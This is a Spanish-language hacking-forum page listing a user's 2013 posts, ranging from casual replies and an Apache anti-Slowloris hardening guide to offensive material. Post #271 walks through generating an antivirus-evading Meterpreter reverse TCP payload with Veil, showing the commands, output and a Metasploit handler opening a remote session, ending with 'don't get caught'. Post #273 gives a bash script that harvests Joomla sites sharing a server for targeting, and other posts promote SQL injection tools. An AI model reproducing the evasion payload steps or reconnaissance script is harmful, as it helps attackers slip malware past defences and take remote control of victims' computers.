Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ZanGetsu

#261
si solo lo inicias sin instalar tienes las mismas herramientas y si
tienes la ultima version (5 r3)
#262

Bueno, hacer un par de semanas me mude a centos, despues de pasar por varias distros GNU/LINUX, lo primero que hize fue montarme mi servidor web Apache, todo andaba de 10 hasta que llegamos a la parte de la seguridad, e aqui un problema, el servidor apache es facilmente derribado, ademas de un par de reglas iptables que en internet son facilmente encontradas y si no podemos leer un poco sobre configuraciones iptables ( You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ), ya con mod security y evasive no era suficiente para un ataque de el poderoso Slowloris, de el cual ya apache desde el año 2009 es victima y lo sige siendo hasta el dia de hoy, ya que no se ha encontrado una solucion concreta al problema.


En la busqueda me encontre con un mod muy interesante y el cual "mitigo" en gran magnitud un ataque de slowloris a mi servidor apache, este mod se llama "MOD_QOS), instalacion:

para instalarnos este mod instalaremos lo siguiente

Código: bash
yum install openssl-devel.x86_64


Código: bash
yum install pcre-devel.x86_64


Código: bash
yum install httpd-devel.x86_64


Descargamos el mod You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descomprimimos:

Código: bash
tar -zxvf mod_qos-10.15.tar.gz


Directorio

Código: bash
cd mod_qos-10.5


Se ingresa al directorio apache2

Código: bash
cd apache2


Se ejecuta la compilación, y se obtendrá una salida como la siguiente:

Código: bash
apxs -i -c  mod_qos.c



Se edita el archivo de configuración de apache;

Código: bash
vim /etc/httpd/conf/httpd.conf


Y se inserta la siguiente línea para el módulo del mod_qos:

Código: text
LoadModule qos_module /usr/lib64/httpd/modules/mod_qos.so


Se crea el archivo de configuración de nombre mod_qos.conf:

Código: bash
touch /etc/httpd/conf.d/qos.conf


Se inserta las siguientes líneas en el archivo de configuración recién creado:

Código: bash
vim /etc/httpd/conf.d/qos.conf


Código: text
## QoS Configuracion
<IfModule mod_qos.c>
#Manejo de conexiones hasta 100000 IPs diferentes
QS_ClientEntries 100000
# Se permite solamente 50 connexiones por IP
QS_SrvMaxConnPerIP 50
# Maximo numero de conexiones TCP activas 256
MaxClients              256
# Desactivar la directiva keep-alive cuando el 70% de las conexiones TCP estan ocupadas:
QS_SrvMaxConnClose      70%
# Minimo de velocidad para peticiones / respuestas (niega a los clientes lentos que bloquean el servidor ,
#Ejemplo; el script slowloris mantiene las peticiones HTTP :
QS_SrvMinDataRate       150 1200
# Limite de peticiones de encabezados y cuerpo (con cuidado, limita las cargas y las peticiones POST):
# LimitRequestFields      30
# QS_LimitRequestBody     102400
</IfModule>


Código: bash
service httpd restart


ademas de eso me agrege esta regla iptables:

Código: bash
iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 20 --connlimit-mask 40 -j DROP


Saludos y disfruten :D

NOTA: las pruebas de ataques fueron realizadas en un servidor vps el cual alcanza una velocidad considerable:


y mi pc 1 mb de velocidad...
#263
bienvenido amigo, disfruta de la comunidad  ;)
#264
Gracias, muy bueno
#265
esa no es la ip de Cl-Security :D
#266
sinceramente, windows esta demas en esa lista , xdD!
#267
intenta repararlo con el cd de instalacion de windows
#268
Bing es muy bueno me gusta mucho, pero aun asi la rapidez de google
es imcomparable, el filtrado de info. solo es cosa de cada usuario
el no dar datos "reales" si no quieres que nadie los sepa es fundamental,

saludos !
#269
Intenta reparar con las opcioones de reparacion con el disco de Windows
porque puede ser que se haya dañado tu archivo de arranque  (BCD), intenta eso y avisas

saludos !
#270
SQLSentinel es una herramienta basada en Java para encontrar vulnerabilidades de inyección SQL en aplicaciones web. Esta herramienta viene con una spyder incorporado que rastrea todas las páginas del sitio web y luego tratar de encontrar errores de SQL. Sólo hay que poner el URL de la página web en el SQLSentinel...



Descarga:  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos !
#271
Bugs y Exploits / Antivirus Bypass con Veil
Junio 12, 2013, 01:19:34 PM
Hace unos pocos días Christopher Truncer publicaba en SU BLOG un artículo sobre una herramienta desarrollada por él mismo y a la que ha dado el nombre de VEIL. Esta herramienta tiene una utilidad interesante para todos aquellos que nos dedicamos al Pentesting y tenemos en ocasiones algún problema con los Antivirus, ya que genera payloads de Metasploit que luego codifica de una manera propia y genera un ejecutable nuevo, a priori no detectado por ellos.

La herramienta puede descargarse de ESTE GITHUB: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
así que os recomendo que lo probéis directamente con Kali Linux.

# git clone You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Incluso si lo hacéis con Kali-Linux, es necesario instalar una serie de componentes en el Wine (Python y otros módulos). Por suerte el autor nos ha dejado un script que lo hace todo de forma automática. Solo tenemos que ir dandole a siguiente a todo lo que salga:

# cd Veil
# cd setup
# ./setup.sh

Una vez hecho esto, ya podemos llamar a Veil y empezar a jugar:

# ./Veil.py
====================================
Veil | [Version]: 1.0 | [Updated]: 05.30.2013
====================================
[By]: Chris Truncer | [Twitter]: @ChrisTruncer
====================================
[?] What payload type would you like to use?
1 - Meterpreter - Python - void pointer
2 - Meterpreter - Python - VirtualAlloc()
3 - Meterpreter - Python - base64 Encoded
4 - Meterpreter - Python - Letter Substitution
5 - Meterpreter - Python - ARC4 Stream Cipher
6 - Meterpreter - Python - DES Encrypted
7 - Meterpreter - Python - AES Encrypted
0 - Exit Veil
[>] Please enter the number of your choice: 7

Nos da varias opciones de técnicas que podemos usar para generar un Meterpreter evadiendo los antivirus. Elegimos, por ejemplo, el cifrado AES, y seguimos adelante:

[?] What type of payload would you like?
1 - Reverse TCP
2 - Reverse HTTP
3 - Reverse HTTPS
0 - Exit Veil
[>] Please enter the number of your choice: 1
[?] What's the Local Host IP Address: 192.168.1.100
[?] What's the Local Port Number: 1212
  • Generating shellcode...

    Elegimos que el payload sea reverse_tcp e introducimos los datos de nuestra IP y puerto a la escucha. Seguimos adelante:

    [?] How would you like to create your payload executable?
    1 - Pyinstaller (default)
    2 - Py2Exe
    [>] Please enter the number of your choice: 1
    184 INFO: wrote Z:\opt\Veil\payload.spec
    244 INFO: Testing for ability to set icons, version resources...
    261 INFO: ... resource update available
    267 INFO: UPX is not available.
    2296 INFO: checking Analysis
    [...]

    Elegimos que genere el binario con PyInstaller, que es la opción por defecto y ,después de unas cuantas lineas, al final nos avisa de que el binario ha sido generado:

    [!] Be sure to set up a Reverse TCP handler with the following settings:
    PAYLOAD = windows/meterpreter/reverse_tcp
    LHOST   = 192.168.1.100
    LPORT   = 1212
    [!] Your payload files have been generated, don't get caught!

    Parece que ya tenemos el Payload generado pero... ¿funcionará? Vamos a lanzar un módulo multi/handler de Metasploit y a ejecutarlo en un Windows, a ver si funciona como nos tiene acostumbrados:

    $ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=1212 E
  • Started reverse handler on 0.0.0.0:1212
  • Starting the payload handler...
  • Sending stage (751104 bytes) to 192.168.1.100
  • Meterpreter session 1 opened (192.168.1.100:1212 -> 192.168.1.100:50461) at 2013-05-31 10:53:58 +0200
    meterpreter > sysinfo
    Computer        : S21SEC-JSELVI
    OS              : Windows 7 (Build 7601, Service Pack 1).
    Architecture    : x86
    System Language : es_ES
    Meterpreter     : x86/win32

    Funcionar vemos que funciona, pero ahora falta ver si de verdad es indetectable por los antivirus. Por norma general no os recomiendo que utilicéis VirusTotal para probar vuestros encoders, porque VT distribuye las muestras a las casa antivirus, así que os podéis encontrar de que de repente empiecen a detectar vuestro encoder, cuando antes no lo hacían. Sin embargo, en este caso, la herramienta es pública, así que es cuestión de tiempo que se pongan con ello y empiecen a detectarlo, por lo que podemos hacer el experimento con VT sin problemas. EL RESULTADO del análisis han sido que solo 2 de los 46 AntiVirus lo han detectado, y ninguno de ellos era de los principales fabricantes del sector.


    o tengo muy claro que su capacidad para evadir los antivirus esté en las técnicas elegidas al arrancar Veil, o si es simplemente por el hecho de estar usando un convertidor de código Python a EXE. No he hecho la prueba, pero veo bastante probable que eso tenga gran parte de la culpa de este resultado.
    Como la herramienta es pública, es cuestión de tiempo que las compañias AV lo analicen y sus binarios empiecen a ser detectados, así que... ¡disfrutáis mientras podáis!

    Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#272
Galería / Re:nuevos wallpapers
Junio 10, 2013, 08:22:23 PM
el segundo la lleva ! , gracias
#273
Batch - Bash / Server Joomla Finder
Junio 09, 2013, 02:01:30 PM


Código: text
#!/bin/bash
  #
  # ---------------------------------
  # Server joomla Finder 
  # Licence : Linux
  # ---------------------------------
  #
  # Title    : Server Joomla Finder
  # Code     : Bash
  # Author   : RedH4t.Viper
  # Email    : [email protected] , [email protected]
  # Released : 2013 04 June
  # Home     : IrIsT Security Center
  # Thanks   : IrIsT ,TBH ,kurdhackteam , 3xp1r3 , thecrowscrew
  #
  # Gr33tz   : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Skote_Vahshat |
  # Gr33tz   : Net.W0lf | Dj.TiniVini| Mr.XHat | Black King | Devil |
  # Gr33tz   : E2MAEN | (^_^) | M4st3r4N0nY |Turk Sever | dr.koderz | V30sharp
  # Gr33tz   : ARTA | Mr.Zer0 | Sajjad13and11 | Silent | Smartprogrammer | 
  # Gr33tz   : x3o-1337 | rEd X | No PM | Gabby | Sukhoi Su-37 | IR Anonymous |
  # Gr33tz   : Megatron | Zer0 | sole sad | Medrik | F@rid | And All Of IrIsT Memebrz |
  #------------------------------------------------------------------------------------------#

  page=0
  how_many=1
  IP_SERVER=$1
  single_page=
  last_page_check=

  banner()
  {
  echo "     _                       _          __ _           _              "
  echo "    (_)                     | |        / _(_)         | |             "
  echo "     _  ___   ___  _ __ ___ | | __ _  | |_ _ _ __   __| | ___ _ __    "
  echo "    | |/ _ \ / _ \| '_ \ _ \| |/ _\ | |  _| | \_ \ / _\ |/ _ \  __|   "
  echo "    | | (_) | (_) | | | | | | | (_| | | | | | | | | (_| |  __/ |      "
  echo "    | |\___/ \___/|_| |_| |_|_|\__,_| |_| |_|_| |_|\__,_|\___|_|      "
  echo "   _/ |                                                               "
  echo "  |__/                                                                "   
  echo "                                                                      "
  }

  Usage()
  {
  echo ""
  echo "# ***************************************************************************​****​​*********************#"
  echo "# Usage      : Server Joomla Finder  <IP/Domain>                                                     *#"
  echo "# Help       : -h && --help : Show This Menu                                                         *#"
  echo "# RunScript  : Give Permision to script and run it !!                                                *#"
  echo "# ***************************************************************************​****​​*********************#"
  echo ""
  }

  Check_Arguments()
  {
  if [ -z "$IP_SERVER" ] || [ "$IP_SERVER" == "-h" ] || [ "$IP_SERVER" == "--help" ]; then
  Usage;
  exit
  fi
  }

  Searching_Jce()
  {
  rm -rf domains.txt
  rm -rf alldomain_bing.txt
  rm -rf IndexDomain.txt

    if [ `echo "$IP_SERVER" | egrep  "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"`  ]; then
      IP="$IP_SERVER"
    else
      IP=`resolveip -s "$IP_SERVER"`
    if [ "$?" != 0 ]; then
    echo -e "[-] Error: cannot resolve $IP_SERVER to an IP "
    fi
      fi

  echo -e "\e[1;35m[*] Finded Joomla Web Sites Will be Save at finded.txt \e[0m"
  echo -e "\e[1;35m[*] Searching Joomla Web Sites on $IP Plz W8 \e[0m"


  touch  alldomain_bing.txt;

  while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

  url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"


  wget -q -O domain_bing.php "$url"


  last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

  # if no results are found, how_many is empty and the loop will exit
  how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

  #  check for a single page of results
  single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `


  cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
  rm -f domain_bing.php
  let page=$page+1
  done


  cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt


    for domain in `cat domains.txt`
    do
      echo "$domain" | grep "com_" >> /dev/null;check=$?
        if [ $check -eq 0 ]
              then
            echo "$domain" >>IndexDomain.txt
        fi
      done

  cat IndexDomain.txt | cut -d '?' -f 1 | awk '{gsub("index.php","")}1' | sort | uniq >> finded.txt

  found_N=`wc -l finded.txt | sed 's/finded.txt//'`
  echo -e "\e[1;34m[+] Found $found_N :) \e[0m"


  for joom in `cat finded.txt`
  do
  echo -e "\e[1;32m[*] $joom \e[0m"   
  done

  rm -rf domains.txt
  rm -rf alldomain_bing.txt
  rm -rf IndexDomain.txt
  }

  main()
  {
  banner ;
  Check_Arguments;
  Searching_Jce;
  }

  main;


Bueno el nombre lo dice todo Finder de Joomla, saludos !
#274
Presentaciones y cumpleaños / Re:hola soy netco0m
Junio 09, 2013, 03:29:49 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
bienvenido loca :D

pensaba de alguna manera pasar piola  :P

jajaj  :D
#275
Presentaciones y cumpleaños / Re:hola soy netco0m
Junio 09, 2013, 02:51:28 AM
bienvenido loca :D
#276
Delphi / Re:[Delphi] GoogleSearch 0.1
Junio 07, 2013, 02:06:13 PM
Muy bueno, gracias
#277
C# - VB.NET / Windows form C# español
Junio 06, 2013, 11:50:09 PM
Hola a todos, un amigo me solicito que publicase un video que realizo el
en la universidad, referente a windows form C# programacion orientada a objetos, el video cuenta con una duracion de una hora, en el cual se tocan temas como el calculo simple que es la suma de textbox de forma rapida y simple, y un termino medio de los procesos automaticos que se llevan acabo dentro de textbox como tambien form de logeos, entre otras cosas...

Disfrutenlo: Creditos "NetCom".

#278
Off Topic / Re:Vale la pena pasarme windows 8
Junio 04, 2013, 06:24:20 AM
quedate con 7, no soy windero pero si lo utilizo
en otros pc y en ese caso prefiero el 7, el 8 es asco !

PD: Considera pasarte a linux xD !

Saludos !
#279
Pentesting / Addons Mozilla Firefox
Junio 04, 2013, 03:45:17 AM
les paso a dejar un par de addons muy servibles

- Geolocalización: Muestra información de Geolocalización de un sitio web utilizando You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Funciona con todas las versiones de Firefox.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Active Whois: Iniciar Whois Activo para obtener detalles acerca de cualquier propietario de un sitio Web y su servidor
(tales como país, correo electrónico y dirección postal para los propietarios de las direcciones IP y dominios de Internet)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Enumeración / fingerprinting
o Header Spy: Muestra las cabeceras HTTP en la barra de estado

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Advanced Dork: Proporciona un acceso rápido a los operadores avanzados de Google directamente desde la
menú contextual. Esto podría ser utilizado como spider a un sitio o búsqueda de archivos ocultos



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Firebug: Firebug se integra con Firefox para poner una gran cantidad de herramientas de desarrollo en su
punta de los dedos mientras navegas. Usted puede editar, depurar y monitorear CSS, HTML y JavaScript
vivir en cualquier página web

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Add N Edit Cookies: ermite añadir y editar "sesión" y guardado
de cookies

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



- HackBar: Esta barra de herramientas le ayudará a probar inyecciones SQL, agujeros XSS y la seguridad del sitio.
Su objetivo principal es ayudar a un desarrollador hacer auditorías de seguridad en su código.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Chickenfoot: es una extensión para Firefox que le da un entorno de programación en
barra lateral del navegador para que pueda escribir scripts para manipular páginas web y automatizar web.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- FoxyProxy: es una herramienta de administración de proxies avanzada, que reemplaza totalmente la
configuración de proxy incluida en firefox. Ofrece funciones como SwitchProxy, ProxyButton, QuickProxy, xyzproxy,
ProxyTex, etc

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- FireEncrypter: le dará cifrado / descifrado y funciones hash directamente desde el navegador web Firefox,
sobre todo útil para los desarrolladores

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Dr.Web LinkChecker: Este plugin le permite comprobar cualquier archivo que va a descargar,
cualquier página que estás a punto de visitar la versión en línea de Dr.Web anti-virus.



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


#280
Bugs y Exploits / Kerinci v0.2 SQL Tool
Junio 01, 2013, 02:54:03 AM
Kerinci es una herramienta de Sql Injection,

Caracteristicas en la version 0.2;

- nuevo motor de inyección SQL. funciona más rápido.
- treeview añadido a la pestaña resultado sqlinjector
- galleta múltiple en línea
- la integración nmap (nmap no está incluido)
- tcp conectar / escuchar (similar a netcat)
- muchos errores todavía existen version 0.1 - primera versión - sql inyector de trabajo .. - fuzzer url de trabajo .. - md5 galleta (fuerza bruta + Lista de palabras) de trabajo .. - navegador web + viewsource


Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login